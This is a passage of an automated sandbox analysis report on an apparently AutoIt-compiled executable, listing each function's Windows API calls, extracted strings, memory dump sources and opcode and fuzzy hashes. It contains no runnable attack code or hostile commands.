                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsnicmp
                                                                                                                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                            • API String ID: 1038674560-3360698832
                                                                                                                            • Opcode ID: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                                                                            • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                                                                                            • Opcode Fuzzy Hash: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                                                                            • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                                                                                            Function 00433D5C Relevance: 42.2, APIs: 28, Instructions: 198windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                                                            • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                                                            • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                                                                            • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                                                            • SelectObject.GDI32(?,?), ref: 00433E29
                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                                                            • GetWindowLongW.USER32 ref: 00433E8A
                                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                                                                            • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                                                                            • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                                                                            • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                                                                            • SelectObject.GDI32(?,?), ref: 00433F63
                                                                                                                            • DeleteObject.GDI32(?), ref: 00433F70
                                                                                                                            • SelectObject.GDI32(?,?), ref: 00433F78
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1582027408-0
                                                                                                                            • Opcode ID: 7578141a4cd2ca5c617c85b142df9d46a946005b36bb3138e461c82ede761e40
                                                                                                                            • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                                                                            • Opcode Fuzzy Hash: 7578141a4cd2ca5c617c85b142df9d46a946005b36bb3138e461c82ede761e40
                                                                                                                            • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                                                                            Function 0046C604 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 216clipboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                            • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                            • CloseClipboard.USER32 ref: 0046C692
                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                            • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                            • CloseClipboard.USER32 ref: 0046C866
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 589737431-2761332787
                                                                                                                            • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                            • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                                                                                                            • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                            • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
                                                                                                                            Function 0045657D Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 287windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCursorPos.USER32(?), ref: 00456692
                                                                                                                            • GetDesktopWindow.USER32 ref: 004566AA
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                                                                            • DestroyWindow.USER32(?), ref: 00456731
                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                                                                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                                                                            • IsWindowVisible.USER32(?), ref: 00456812
                                                                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                                                                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                                                                            • GetMonitorInfoW.USER32 ref: 00456894
                                                                                                                            • CopyRect.USER32(?,?), ref: 004568A8
                                                                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                            • String ID: ($,$tooltips_class32
                                                                                                                            • API String ID: 541082891-3320066284
                                                                                                                            • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                            • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                                                                            • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                            • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                                                                            Function 00454DAA Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 203windowlibraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _wcslen.LIBCMT ref: 00454DCF
                                                                                                                            • _wcslen.LIBCMT ref: 00454DE2
                                                                                                                            • __wcsicoll.LIBCMT ref: 00454DEF
                                                                                                                            • _wcslen.LIBCMT ref: 00454E04
                                                                                                                            • __wcsicoll.LIBCMT ref: 00454E11
                                                                                                                            • _wcslen.LIBCMT ref: 00454E24
                                                                                                                            • __wcsicoll.LIBCMT ref: 00454E31
                                                                                                                              • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                                                                            • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                                                                                            • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                                                                            • DestroyIcon.USER32(?), ref: 00454FA2
                                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                                                                            • String ID: .dll$.exe$.icl$#v
                                                                                                                            • API String ID: 2511167534-1852478350
                                                                                                                            • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                            • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                                                                            • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                            • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                                                                            Function 00436B3A Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 190COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                                                                            • _wcslen.LIBCMT ref: 00436B79
                                                                                                                            • _wcscpy.LIBCMT ref: 00436B9F
                                                                                                                            • _wcscat.LIBCMT ref: 00436BC0
                                                                                                                            • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                                                                            • _wcscat.LIBCMT ref: 00436C2A
                                                                                                                            • _wcscat.LIBCMT ref: 00436C31
                                                                                                                            • __wcsicoll.LIBCMT ref: 00436C4B
                                                                                                                            • _wcsncpy.LIBCMT ref: 00436C62
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                            • API String ID: 1503153545-1459072770
                                                                                                                            • Opcode ID: da048ba66ce88b48ef30bdef6a2df63bad05d76c483f80e633b4d0ed67bbdd23
                                                                                                                            • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                                                                            • Opcode Fuzzy Hash: da048ba66ce88b48ef30bdef6a2df63bad05d76c483f80e633b4d0ed67bbdd23
                                                                                                                            • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                                                                            Function 00452788 Relevance: 34.8, APIs: 23, Instructions: 344COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                                                                            • _fseek.LIBCMT ref: 004527FC
                                                                                                                            • __wsplitpath.LIBCMT ref: 0045285C
                                                                                                                            • _wcscpy.LIBCMT ref: 00452871
                                                                                                                            • _wcscat.LIBCMT ref: 00452886
                                                                                                                            • __wsplitpath.LIBCMT ref: 004528B0
                                                                                                                            • _wcscat.LIBCMT ref: 004528C8
                                                                                                                            • _wcscat.LIBCMT ref: 004528DD
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452914
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452925
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452944
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452955
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452976
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452987
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452998
                                                                                                                            • __fread_nolock.LIBCMT ref: 004529A9
                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452A39
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2054058615-0
                                                                                                                            • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                            • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                                                                            • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                            • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                                                                            Function 004559A8 Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 401COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 0-4108050209
                                                                                                                            • Opcode ID: e06975847f9587479798518a9de21672e2e0b2e771e0c485f95415178a901e8a
                                                                                                                            • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                                                                            • Opcode Fuzzy Hash: e06975847f9587479798518a9de21672e2e0b2e771e0c485f95415178a901e8a
                                                                                                                            • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                                                                            Function 00448759 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 2353593579-4108050209
                                                                                                                            • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                            • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                                                                            • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                            • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                                                                            Function 0044A0EA Relevance: 31.7, APIs: 21, Instructions: 196windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSysColor.USER32 ref: 0044A11D
                                                                                                                            • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                                                            • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                                                                            • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                                                                            • GetWindowDC.USER32 ref: 0044A277
                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                                                                            • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                                                                            • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1744303182-0
                                                                                                                            • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                            • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                                                                            • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                            • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                                                                            Function 0046884B Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 113COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsicoll$__wcsnicmp
                                                                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                            • API String ID: 790654849-1810252412
                                                                                                                            • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                                            • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                                                                            • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                                            • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                                                                            Function 0046CAAA Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 229COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
